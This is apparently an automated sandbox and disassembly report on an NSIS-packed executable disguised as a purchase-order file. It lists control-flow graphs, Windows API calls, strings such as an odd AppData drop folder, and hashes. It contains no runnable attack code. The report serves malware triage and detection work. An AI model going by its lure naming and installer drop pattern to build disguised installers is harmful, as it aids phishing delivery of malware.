                                                • String ID: "C:\Users\user\Desktop\PO 0309494059506060609696007.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PO 0309494059506060609696007.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                • API String ID: 4283519449-2978476238
                                                • Opcode ID: 9da78bb69fdb731252d5033ab884fa182416324aee7ddcf9fc3f40609bcd7e9e
                                                • Instruction ID: dd9ea635540f9dffb1b2b479f8e1e5c18960c1b6140bd96a969558b27d112ec4
                                                • Opcode Fuzzy Hash: 9da78bb69fdb731252d5033ab884fa182416324aee7ddcf9fc3f40609bcd7e9e
                                                • Instruction Fuzzy Hash: C151F471901205ABDB20AF60DD85B9F7FA8FB0431AF15403BF910B62D5C7789E408BAD

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 436 4062dc-4062e7 437 4062e9-4062f8 436->437 438 4062fa-406310 436->438 437->438 439 406316-406323 438->439 440 406528-40652e 438->440 439->440 441 406329-406330 439->441 442 406534-40653f 440->442 443 406335-406342 440->443 441->440 445 406541-406545 call 4062ba 442->445 446 40654a-40654b 442->446 443->442 444 406348-406354 443->444 447 406515 444->447 448 40635a-406398 444->448 445->446 452 406523-406526 447->452 453 406517-406521 447->453 450 4064b8-4064bc 448->450 451 40639e-4063a9 448->451 456 4064be-4064c4 450->456 457 4064ef-4064f3 450->457 454 4063c2 451->454 455 4063ab-4063b0 451->455 452->440 453->440 463 4063c9-4063d0 454->463 455->454 460 4063b2-4063b5 455->460 461 4064d4-4064e0 call 4062ba 456->461 462 4064c6-4064d2 call 406201 456->462 458 406502-406513 lstrlenW 457->458 459 4064f5-4064fd call 4062dc 457->459 458->440 459->458 460->454 466 4063b7-4063ba 460->466 472 4064e5-4064eb 461->472 462->472 468 4063d2-4063d4 463->468 469 4063d5-4063d7 463->469 466->454 473 4063bc-4063c0 466->473 468->469 470 406412-406415 469->470 471 4063d9-4063f7 call 406188 469->471 477 406425-406428 470->477 478 406417-406423 GetSystemDirectoryW 470->478 479 4063fc-406400 471->479 472->458 476 4064ed 472->476 473->463 480 4064b0-4064b6 call 40654e 476->480 482 406493-406495 477->482 483 40642a-406438 GetWindowsDirectoryW 477->483 481 406497-40649b 478->481 484 4064a0-4064a3 479->484 485 406406-40640d call 4062dc 479->485 480->458 481->480 487 40649d 481->487 482->481 486 40643a-406444 482->486 483->482 484->480 490 4064a5-4064ab lstrcatW 484->490 485->481 492 406446-406449 486->492 493 40645e-406474 SHGetSpecialFolderLocation 486->493 487->484 490->480 492->493 497 40644b-406452 492->497 494 406476-40648d SHGetPathFromIDListW CoTaskMemFree 493->494 495 40648f 493->495 494->481 494->495 495->482 498 40645a-40645c 497->498 498->481 498->493
                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040641D
                                                • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dll,?,00405359,Skipped: C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dll,00000000), ref: 00406430
                                                • SHGetSpecialFolderLocation.SHELL32(00405359,0041C000,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dll,?,00405359,Skipped: C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dll,00000000), ref: 0040646C
                                                • SHGetPathFromIDListW.SHELL32(0041C000,Call), ref: 0040647A
                                                • CoTaskMemFree.OLE32(0041C000), ref: 00406485
                                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004064AB
                                                • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dll,?,00405359,Skipped: C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dll,00000000), ref: 00406503
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                • String ID: 7y$Call$Skipped: C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                • API String ID: 717251189-3695716558
                                                • Opcode ID: df6cdb4c1de4ea8ada6da54e9ab12c0970cafabfb890ab4206d2060bd1a8c1b5
                                                • Instruction ID: 29f0adb049bea166a756856afc1b7ff582c4fdfd81cc2e884c30b49282791dbd
                                                • Opcode Fuzzy Hash: df6cdb4c1de4ea8ada6da54e9ab12c0970cafabfb890ab4206d2060bd1a8c1b5
                                                • Instruction Fuzzy Hash: E6611071A00111ABDF209F54DC41AAE37A9EF45318F26803FE943BA2D0D77D9AA1C79D

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 563 40176f-401794 call 402c41 call 405c06 568 401796-40179c call 4062ba 563->568 569 40179e-4017b0 call 4062ba call 405b8f lstrcatW 563->569 574 4017b5-4017b6 call 40654e 568->574 569->574 578 4017bb-4017bf 574->578 579 4017c1-4017cb call 4065fd 578->579 580 4017f2-4017f5 578->580 587 4017dd-4017ef 579->587 588 4017cd-4017db CompareFileTime 579->588 582 4017f7-4017f8 call 405d8b 580->582 583 4017fd-401819 call 405db0 580->583 582->583 590 40181b-40181e 583->590 591 40188d-4018b6 call 405322 call 403116 583->591 587->580 588->587 593 401820-40185e call 4062ba * 2 call 4062dc call 4062ba call 405920 590->593 594 40186f-401879 call 405322 590->594 604 4018b8-4018bc 591->604 605 4018be-4018ca SetFileTime 591->605 593->578 625 401864-401865 593->625 606 401882-401888 594->606 604->605 609 4018d0-4018db CloseHandle 604->609 605->609 607 402ace 606->607 611 402ad0-402ad4 607->611 612 4018e1-4018e4 609->612 613 402ac5-402ac8 609->613 615 4018e6-4018f7 call 4062dc lstrcatW 612->615 616 4018f9-4018fc call 4062dc 612->616 613->607 622 401901-4022fc call 405920 615->622 616->622 622->611 625->606 627 401867-401868 625->627 627->594
                                                APIs
                                                • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\sillinesses\Foiningly,?,?,00000031), ref: 004017B0
                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\sillinesses\Foiningly,?,?,00000031), ref: 004017D5
                                                  • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00000400,00403460,Undseeligheds17 Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7
                                                  • Part of subcall function 00405322: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dll,00000000,0041C000,74DF23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                  • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,Skipped: C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dll,00000000,0041C000,74DF23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                  • Part of subcall function 00405322: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dll,0040327A,0040327A,Skipped: C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dll,00000000,0041C000,74DF23A0), ref: 0040537D
                                                  • Part of subcall function 00405322: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dll), ref: 0040538F
                                                  • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                  • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                  • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                • String ID: C:\Users\user\AppData\Local\Temp\nst14AC.tmp$C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dll$C:\Users\user\AppData\Local\sillinesses\Foiningly$Call
                                                • API String ID: 1941528284-187489355
                                                • Opcode ID: 7fae95537fd550c9b23cdb732f8be4552f44834447fe318359e00607eb2eebaf
                                                • Instruction ID: 24a82d921ca393d09b0f70664e9a68f54f64900ed4cc6ef124b6c19d11fe7a64
                                                • Opcode Fuzzy Hash: 7fae95537fd550c9b23cdb732f8be4552f44834447fe318359e00607eb2eebaf
                                                • Instruction Fuzzy Hash: 12419371900518BACF107BA5DD46DAF3A79EF45368F20423FF422B10E1DA3C8A519A6D

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 629 405322-405337 630 40533d-40534e 629->630 631 4053ee-4053f2 629->631 632 405350-405354 call 4062dc 630->632 633 405359-405365 lstrlenW 630->633 632->633 635 405382-405386 633->635 636 405367-405377 lstrlenW 633->636 638 405395-405399 635->638 639 405388-40538f SetWindowTextW 635->639 636->631 637 405379-40537d lstrcatW 636->637 637->635 640 40539b-4053dd SendMessageW * 3 638->640 641 4053df-4053e1 638->641 639->638 640->641 641->631 642 4053e3-4053e6 641->642 642->631
                                                APIs
                                                • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dll,00000000,0041C000,74DF23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                • lstrlenW.KERNEL32(0040327A,Skipped: C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dll,00000000,0041C000,74DF23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dll,0040327A,0040327A,Skipped: C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dll,00000000,0041C000,74DF23A0), ref: 0040537D
                                                • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dll), ref: 0040538F
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dll
                                                • API String ID: 2531174081-1090293766
                                                • Opcode ID: 1706c8bfaee06fe948536b36c511b95b14908b6c3217ac5f56fabf370ecdb5cf
                                                • Instruction ID: 851cb2e595d07e8670ef4c489cf40fd5108cb81fe88e509cf6dd9e4b353e565e
                                                • Opcode Fuzzy Hash: 1706c8bfaee06fe948536b36c511b95b14908b6c3217ac5f56fabf370ecdb5cf
                                                • Instruction Fuzzy Hash: 20218371900518BACF11AFA5DD859CFBFB9EF45350F14807AF904B62A0C7B94A40DFA8

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 643 403116-40312d 644 403136-40313f 643->644 645 40312f 643->645 646 403141 644->646 647 403148-40314d 644->647 645->644 646->647 648 40315d-40316a call 403331 647->648 649 40314f-403158 call 403347 647->649 653 403170-403174 648->653 654 40331f 648->654 649->648 655 4032ca-4032cc 653->655 656 40317a-4031c3 GetTickCount 653->656 657 403321-403322 654->657 658 40330c-40330f 655->658 659 4032ce-4032d1 655->659 660 403327 656->660 661 4031c9-4031d1 656->661 662 40332a-40332e 657->662 663 403311 658->663 664 403314-40331d call 403331 658->664 659->660 665 4032d3 659->665 660->662 666 4031d3 661->666 667 4031d6-4031e4 call 403331 661->667 663->664 664->654 675 403324 664->675 669 4032d6-4032dc 665->669 666->667 667->654 677 4031ea-4031f3 667->677 672 4032e0-4032ee call 403331 669->672 673 4032de 669->673 672->654 681 4032f0-4032fc call 405e62 672->681 673->672 675->660 678 4031f9-403219 call 4067f5 677->678 685 4032c2-4032c4 678->685 686 40321f-403232 GetTickCount 678->686 687 4032c6-4032c8 681->687 688 4032fe-403308 681->688 685->657 689 403234-40323c 686->689 690 40327d-40327f 686->690 687->657 688->669 691 40330a 688->691 692 403244-403275 MulDiv wsprintfW call 405322 689->692 693 40323e-403242 689->693 694 403281-403285 690->694 695 4032b6-4032ba 690->695 691->660 701 40327a 692->701 693->690 693->692 698 403287-40328e call 405e62 694->698 699 40329c-4032a7 694->699 695->661 696 4032c0 695->696 696->660 704 403293-403295 698->704 700 4032aa-4032ae 699->700 700->678 703 4032b4 700->703 701->690 703->660 704->687 705 403297-40329a 704->705 705->700
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: CountTick$wsprintf
                                                • String ID: ... %d%%$JrA$@
                                                • API String ID: 551687249-1851874788
                                                • Opcode ID: 96eaf062ea73649446efa1d4ac15cc7ad135f89646bd32d400015c4a483b639e
                                                • Instruction ID: 5c504835c6c52170eea8577a9cac8da2a2598cbf1b76cdbdeb728d3f56fa2377
                                                • Opcode Fuzzy Hash: 96eaf062ea73649446efa1d4ac15cc7ad135f89646bd32d400015c4a483b639e
                                                • Instruction Fuzzy Hash: AA517A71900219DBCB10DFA5DA84A9E7BB8AF04366F14417BEC14B72C0CB78DA40CBA9

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 706 40264a-402663 call 402c1f 709 402ac5-402ac8 706->709 710 402669-402670 706->710 711 402ace-402ad4 709->711 712 402672 710->712 713 402675-402678 710->713 712->713 715 4027dc-4027e4 713->715 716 40267e-40268d call 40621a 713->716 715->709 716->715 719 402693 716->719 720 402699-40269d 719->720 721 402732-402735 720->721 722 4026a3-4026be ReadFile 720->722 724 402737-40273a 721->724 725 40274d-40275d call 405e33 721->725 722->715 723 4026c4-4026c9 722->723 723->715 727 4026cf-4026dd 723->727 724->725 728 40273c-402747 call 405e91 724->728 725->715 733 40275f 725->733 730 4026e3-4026f5 MultiByteToWideChar 727->730 731 402798-4027a4 call 406201 727->731 728->715 728->725 730->733 734 4026f7-4026fa 730->734 731->711 737 402762-402765 733->737 738 4026fc-402707 734->738 737->731 740 402767-40276c 737->740 738->737 741 402709-40272e SetFilePointer MultiByteToWideChar 738->741 742 4027a9-4027ad 740->742 743 40276e-402773 740->743 741->738 744 402730 741->744 746 4027ca-4027d6 SetFilePointer 742->746 747 4027af-4027b3 742->747 743->742 745 402775-402788 743->745 744->733 745->715 748 40278a-402790 745->748 746->715 749 4027b5-4027b9 747->749 750 4027bb-4027c8 747->750 748->720 751 402796 748->751 749->746 749->750 750->715 751->715
                                                APIs
                                                • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                  • Part of subcall function 00405E91: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405EA7
                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                • String ID: 9
                                                • API String ID: 163830602-2366072709
                                                • Opcode ID: 19438e2e62ba8aece1a895eee3c3762f252ce0cb36923fbe756b3879527f42a2
                                                • Instruction ID: 0a1b8613d15e357d59cabb4a84863d73d9dad353ca9b6e0785da3ca47288b3a0
                                                • Opcode Fuzzy Hash: 19438e2e62ba8aece1a895eee3c3762f252ce0cb36923fbe756b3879527f42a2
                                                • Instruction Fuzzy Hash: 42511974D00219AEDF219F95DA88AAEB779FF04304F10443BE901B72D0DBB89982CB18

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 752 406624-406644 GetSystemDirectoryW 753 406646 752->753 754 406648-40664a 752->754 753->754 755 40665b-40665d 754->755 756 40664c-406655 754->756 758 40665e-406691 wsprintfW LoadLibraryExW 755->758 756->755 757 406657-406659 756->757 757->758
                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
                                                • wsprintfW.USER32 ref: 00406676
                                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040668A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                • String ID: %s%S.dll$UXTHEME$\
                                                • API String ID: 2200240437-1946221925
                                                • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                • Instruction ID: 9fa172bba6ca99a644905d2b6d7ed641771312ed853c50fe9922007c80c3d461
                                                • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                • Instruction Fuzzy Hash: 7CF0FC70501119A6CF10BB64DD0EF9B365CA700304F10447AA54AF10D1EBB9DB64CB99

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 759 4057f1-40583c CreateDirectoryW 760 405842-40584f GetLastError 759->760 761 40583e-405840 759->761 762 405869-40586b 760->762 763 405851-405865 SetFileSecurityW 760->763 761->762 763->761 764 405867 GetLastError 763->764 764->762
                                                APIs
                                                • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405834
                                                • GetLastError.KERNEL32 ref: 00405848
                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040585D
                                                • GetLastError.KERNEL32 ref: 00405867
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                • String ID: C:\Users\user\Desktop
                                                • API String ID: 3449924974-224404859
                                                • Opcode ID: 817c7eeb2e6ade2cce28f3b9d2e4670c9c7091e2f59c9eba6f9578a5288f1365
